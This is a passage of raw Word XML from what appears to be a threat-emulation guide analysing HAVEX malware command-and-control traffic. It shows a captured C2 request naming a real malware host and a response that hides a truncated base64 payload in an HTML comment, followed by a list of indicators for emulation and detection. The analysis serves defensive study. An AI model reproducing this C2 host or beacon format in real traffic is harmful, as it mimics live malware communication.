        </w:rPr>
        <w:t>Host: toons.freesexycomics.com</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:t>Content-Length: 0</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:t>Cache-Control: no-cache</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C48EFF" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>POST Response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06AEA654" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:t>HTTP/1.1 200 OK</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:t>Date: Wed, 22 Jan 2014 13:40:48 GMT</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:t>Content-Type: text/html</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:t>Transfer-Encoding: chunked</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:t>Connection: keep-alive</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:t>Server: Apache/1.3.37 (Unix)</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:t>Cache-Control: no-cache</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:t>9f65</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:t>&lt;html&gt;&lt;head&gt;&lt;mega http-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:t>equiv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:t>=’CACHE-CONTROL’ content=’NO-CACHE’&gt;&lt;/head&gt;&lt;body&gt;No data!&lt;!--havexQlpoOTFBWSZTWWYvDI0BOsD//////////////////////////////////</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>///////////4oB+93VVXu69DuN7XYzds9yt49Ques</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:t>[...TRUNCATED ...]</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:t>+yUW3zfTxWAOstsCwCckdW5 AH5Q6vbbCu7GputPt5CSfgPCAKXcAOOICMsqliACGYEhAQT3v9eD</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:t>M92D/8XckU4UJBmLwyNA==</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:t>havex</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:t>--&gt;&lt;/body&gt;&lt;/head&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="752FA83F" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve">In this example from Symantec, several indicators </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>can be identified.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405680E2" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>The POST request shows several indicators that may be incorporated into an emulated threat:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519B2BA7" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="111"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>A target PHP file (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dtcla.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E67F6F" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="111"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Interesting URL parameters (id, v1, v2, q)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB39007" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="111"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>A potentially interesting User-Agent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA93A0D" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="111"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">A target </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>host</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0324F8F1" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Like the request, the response has several indicators:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6EDE89" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="112"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>A server header</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045C1554" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="112"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>A potentially unique ID (9f65)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAADCAE" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="112"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Base64-encoded data stored between text (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>havex</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt; base64 &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>havex</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E0DCA6" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Note: MALWAREMUSTDIE2 posted a great write-up on the HAVEX malware. This provides additional examples of C2 source code and HTTP request/response pairs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017D9331" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49846BD5" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="113"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
